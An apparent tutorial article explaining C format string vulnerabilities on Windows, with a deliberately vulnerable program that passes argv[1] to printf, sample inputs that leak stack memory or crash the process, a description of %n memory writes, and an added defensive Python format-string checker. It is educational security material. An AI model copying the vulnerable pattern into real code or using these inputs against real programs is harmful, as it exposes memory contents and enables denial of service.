<a href="http://i.nextmedia.com.au/News/Computer_Bug_Virus.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.nextmedia.com.au/News/Computer_Bug_Virus.jpg" height="424" width="640" /></a></div>
<br />
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">ABSTRACT</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The format string vulnerability came to prominence in 2000, when remote attackers gained root access on a host running an FTP daemon that had an anonymous authentication mechanism. This was an entirely new way of exploiting a common programming mistake, and the threat is now everywhere, because programmers inadvertently keep writing the very coding flaw that format string attacks target. The format string vulnerability arises from misinterpreting the stack when handling functions with variable arguments, especially the <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Printf</em> function; this article demonstrates this subtle bug in a C programming context on the Windows operating system. As with buffer overflow attacks, this class of bug is not operating-system specific: you can find vulnerable programs on Mac OS, Linux and BSD as well. This article delves into what format strings are, how they operate relative to the stack, and how they are manipulated from the perspective of the C programming language.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">ESSENTIALS</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
To follow the format string bug explained in this article, you will need rudimentary knowledge of the C family of programming languages, as well as basic knowledge of IA32 assembly on the Windows operating system, using the Visual Studio development editor. Moreover, familiarity with ‘buffer overflow’ exploitation will definitely be an advantage.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">FORMAT STRING BUG</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The format string bug was first explained in June 2000 in a renowned journal. This notorious exploitation technique enables an attacker to subvert memory stack protections and to alter arbitrary memory by writing to it without authorisation. The sole root cause is failing to handle or properly validate user-supplied input: blindly trusting user-supplied arguments eventually leads to disaster. When an attacker controls the format argument of the <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Printf</em> function, the handling of the variable argument list enables him to read or overwrite arbitrary data. The format string bug is unlike a buffer overrun: the stack is not smashed, nor is data corrupted on a large scale. Attackers often use this attack to disclose or retrieve sensitive information from the stack, for instance passwords, private cryptographic keys, etc.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The question now is how exactly attackers perform this attack. Consider a program that prints the string “kmaraj” to the screen using the simple C library <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Printf</em> function, as follows:</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Program: sample code</div>
<pre class="brush: plain; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">#include "stdio.h"
int main(){
    char sVal[] = "kmaraj";          /* the string we want to print */
    printf("My name is %s", sVal);   /* %s is replaced with the contents of sVal */
    return 0;
}
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The above program is quite simple: at line 5, the first parameter specifies the %s format specifier, which causes the <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Printf</em> function to replace %s with the contents of the null-terminated string buffer. Everything looks good at first glance, but what if the programmer does not specify a format string in the <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Printf</em> call at all? The program will still compile and run error-free and produce the desired output, but this time it is exploitable via a format string attack.</div>
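As an added example (not from the article), the following Python models how printf walks its variable argument list by parsing the conversion specifications in its format string: a string under user control that reaches printf as the format dictates how many stack slots are consumed, which is what makes printf(sVal) dangerous and printf("%s", sVal) safe. The class and function names are mine; the sample strings are constructed.

```python
import re
from dataclasses import dataclass

# One printf conversion specification: %[flags][width][.precision][length]conversion
_CONVERSION = re.compile(
    r"%(?P<flags>[-+ #0]*)"
    r"(?P<width>\*|\d+)?"
    r"(?:\.(?P<precision>\*|\d*))?"
    r"(?P<length>hh|h|ll|l|j|z|t|L)?"
    r"(?P<conv>[diouxXeEfFgGaAcspn%])"
)


@dataclass
class FormatReport:
    consumed: int = 0        # stack slots printf pulls from its variable argument list
    dereferences: int = 0    # %s: a slot is treated as a pointer and memory is read through it
    writes: int = 0          # %n: a slot is treated as a pointer and memory is written through it
    malformed: bool = False  # a '%' not followed by a valid conversion (undefined behaviour in C)

    @property
    def safe_as_format(self) -> bool:
        """True only if printf(fmt) would touch nothing beyond the format string itself."""
        return self.consumed == 0 and not self.malformed


def analyse_format(fmt: str) -> FormatReport:
    """Walk `fmt` the way printf does and count what it would read from the stack."""
    report = FormatReport()
    pos = 0
    while (idx := fmt.find("%", pos)) != -1:
        match = _CONVERSION.match(fmt, idx)
        if match is None:
            report.malformed = True
            pos = idx + 1
            continue
        pos = match.end()
        conv = match.group("conv")
        if conv == "%":                      # "%%" prints a literal '%' and consumes nothing
            continue
        if match.group("width") == "*":
            report.consumed += 1             # width is taken from the argument list
        if match.group("precision") == "*":
            report.consumed += 1             # precision is taken from the argument list
        report.consumed += 1                 # the converted value itself
        if conv == "s":
            report.dereferences += 1
        elif conv == "n":
            report.writes += 1
    return report


def slots_read_beyond_arguments(fmt: str, pushed_args: int) -> int:
    """Stack slots printf reads past the arguments the caller actually pushed.

    printf("My name is %s", sVal) pushes one argument for one %s, so 0;
    printf(sVal) with sVal == "%x %x" pushes none for two %x, so 2: those two
    slots are the caller's locals and return address in the article's diagram."""
    return max(0, analyse_format(fmt).consumed - pushed_args)


if __name__ == "__main__":
    # Constructed sample inputs; note that innocent-looking "50% off" is a valid "% o" conversion
    for text in ("kmaraj", "My name is %s", "%x %x %x %x", "50% off", "%n"):
        print(f"{text!r:20} -> {analyse_format(text)}")
```

A logging wrapper that receives untrusted text can run it through analyse_format and refuse or escape anything for which safe_as_format is false, though the real fix is never to pass user data as the format argument.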
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">MISINTERPRETING THE STACK</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
In the prior section, you saw how an attacker triggers the format string bug. In this section we explore how the stack is misinterpreted by means of this bug. Suppose that in the earlier program you accomplish the task in the most obvious, direct way, without using the ‘specifier’ in the <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Printf</em> call, as follows;</div>
<pre class="brush: plain; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">printf("My name is %s", sVal);   /* with a format specifier: sVal is only ever data */
printf(sVal);                    /* without one: sVal itself becomes the format string */
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
In fact, both of the preceding printf calls produce the same output. But which one is more secure and better? When analysing printf's stack usage in C, we find that arguments are pushed onto the stack from last to first. The assembly representation of the first call (with the specifier) is as follows;</div>
<pre class="brush: plain; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">push address of "sVal"
push address of "%s"
call printf
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Once the parameters are pushed onto the stack and the call instruction is executed, the stack looks like the following.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin: 0px; padding: 0px; text-align: center; vertical-align: baseline;">
<table border="0" style="border-collapse: collapse; border-spacing: 0px; border: 0px; box-sizing: border-box; font-family: inherit; font-size: 14px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px 0px 1.4em; padding: 0px; vertical-align: baseline; width: 580px;"><colgroup style="box-sizing: border-box;"><col style="box-sizing: border-box; width: 164px;"></col></colgroup><tbody style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;" valign="top">
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: 23px; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 0.75pt; border-color: initial; border-left-width: 0.75pt; border-right-width: 0.75pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;" valign="middle"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
……..</div>
</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: 26px; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 1.5pt; border-color: initial; border-left-width: 1.5pt; border-right-width: 1.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;" valign="bottom"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
Caller Local Variables</div>
</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: 29px; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 1.5pt; border-color: initial; border-left-width: 1.5pt; border-right-width: 1.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;" valign="middle"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
Address of sVal</div>
</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: 31px; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 1.5pt; border-color: initial; border-left-width: 1.5pt; border-right-width: 1.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;" valign="middle"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
Address of “%s”</div>
</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: 26px; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 1.5pt; border-color: initial; border-left-width: 1.5pt; border-right-width: 1.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;" valign="middle"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
Return Address</div>
</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: 32px; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 1.5pt; border-color: initial; border-left-width: 1.5pt; border-right-width: 1.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;" valign="middle"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
Printf() Variable</div>
</td></tr>
</tbody></table>
</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Printf</em> function uses its first parameter to interpret what it sees on the stack. Therefore, the content referenced by one stack parameter dictates how many further parameters are read, and whether each of them is interpreted as a value or as a reference. Without a specifier, on the other hand, the <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Printf</em> function expects the stack to look as follows;</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin: 0px; padding: 0px; text-align: center; vertical-align: baseline;">
<table border="0" style="border-collapse: collapse; border-spacing: 0px; border: 0px; box-sizing: border-box; font-family: inherit; font-size: 14px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px 0px 1.4em; padding: 0px; vertical-align: baseline; width: 580px;"><colgroup style="box-sizing: border-box;"><col style="box-sizing: border-box; width: 164px;"></col></colgroup><tbody style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;" valign="top">
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: 23px; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 0.75pt; border-color: initial; border-left-width: 0.75pt; border-right-width: 0.75pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;" valign="middle"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
……..</div>
</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: 26px; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 1.5pt; border-color: initial; border-left-width: 1.5pt; border-right-width: 1.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;" valign="bottom"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
Caller Local Variables</div>
</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: 29px; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 1.5pt; border-color: initial; border-left-width: 1.5pt; border-right-width: 1.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;" valign="middle"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
Address of sVal</div>
</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: 26px; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 1.5pt; border-color: initial; border-left-width: 1.5pt; border-right-width: 1.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;" valign="middle"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
Return Address</div>
</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: 32px; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 1.5pt; border-color: initial; border-left-width: 1.5pt; border-right-width: 1.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;" valign="middle"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
Printf() Variable</div>
</td></tr>
</tbody></table>
</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Here, the <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">sVal</em> buffer is the first parameter to the <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Printf</em> function, so the function interprets it as the format string. When untrusted input placed in the <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">sVal</em> buffer contains format specifiers, the programmer will not have anticipated them as part of the input. The attacker can therefore walk the stack at will: each specifier pops a value off the stack, so carefully chosen specifiers bring the desired data to the top. If the attacker knows the offset at which something interesting sits on the stack, he can compute the number of percent signs and other format specifiers needed to make the referenced value appear in the output.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">EXPLOITATION IN ACTION</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
C and C++ are the languages most prone to format string attacks, whereas modern languages such as C# and Java will not typically allow the execution of arbitrary code through one. The design of C/C++ makes format string problems harder to detect, and its format language includes some especially dangerous directives that do not exist in other languages' format languages. A successful attack can lead directly to the execution of arbitrary code and to information disclosure. A format string is defined in a small data-processing language that streamlines output formatting. Unfortunately, many programmers make a subtle mistake while coding: they use data from an untrusted source as the format string, and intruders supply crafted format strings to cause serious harm.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The root of this bug in C/C++ is that a function declared with an ellipsis (…) as its last parameter accepts a variable number of arguments and, even at run time, has no way of knowing how many arguments were actually passed to it. With that in mind, let's look at the following simple C++ code snippet, which displays a string value taken from the command line.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Program: FSA.CPP</div>
<pre class="brush: plain; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title=""> #include <stdio.h>
/* Displays the first command-line argument. The argument is handed to
   printf() as the format string itself, which is the format string bug
   discussed in this article. */
int main(int argc, char* argv[])
{
    if( argc != 2 )
    {
        printf("Enter the command Argument\n");
    }
    if(argc > 1)
    {
        printf(argv[1]);   /* vulnerable: user input used as the format string */
    }
    return 0;
}
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
At first glance the code above looks fairly simple, but it carries an inherent format string bug that the programmer is unaware of: <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Printf</em> is called with the user's string as its format and with no format specifiers or argument list of its own. Let's observe the vulnerable program. Although we have supplied a format string, we have not supplied any variable to be substituted into it. Interestingly, <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Printf</em> does not fail; instead it produces bizarre output that looks like this:</div>
<pre class="brush: plain; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">D:\temp>fsa.exe Hello%x%x
hello350ffda
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
If you open FSA.EXE in a hex editor such as WinHex, you will observe the same stack memory sequence that the previous sample yielded using %x. Moreover, by using multiple %x specifiers we can read further into the stack, and the result can be the exposure of sensitive data held in memory, including passwords, encryption keys and so on.</div>
<pre class="brush: plain; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">D:\temp>fsa.exe "%x %x %x %x"
350 ffce 158 2
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Another, more interesting specifier is %n, which writes to memory and can therefore change the default behaviour of the program. For example, a program might store a password for some administrative feature in memory. That password can be null-terminated using the %n specifier, which would then allow access to the administrative feature with a blank password.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Format string attacks typically rely on the %x and %n specifiers in particular, but the other specifiers can be used to crash the program or to advance through the stack. What is really happening in the preceding demonstration is that when the number of actual arguments does not match the number of tokens in the format string, the output includes whatever happens to be on the stack. The following figure shows four values being read from the stack and printed in this abusive manner:</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/051915_1101_FORMATSTRIN1.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;">
Figure: Stack after exploitation</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
A format string bug can also be used for a denial-of-service attack, by a malicious user forcing the process to crash. It is relatively easy to crash a program with malicious format specifiers, especially %s (which reads a null-terminated string through a pointer) and %n. If a malicious format string containing either of these specifiers is supplied and no valid memory address sits where the corresponding variable should be, the process dies while trying to dereference the bogus stack value, which causes a denial of service.</div>
<pre class="brush: plain; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">D:\temp>fsa.exe %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Likewise, if a large number of “%d” specifiers is supplied, the reads may eventually reach illegal addresses that are not mapped, which again results in a denial of service.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Moreover, the %s format parameter can be used to read from a memory address: it retrieves the address from the stack and prints the string found there. %x and %d retrieve a double word from the stack and print it in hexadecimal or decimal notation. Finally, the %c specifier obtains a double word from the stack, converts it into a single byte of type char and displays it as a character.</div>
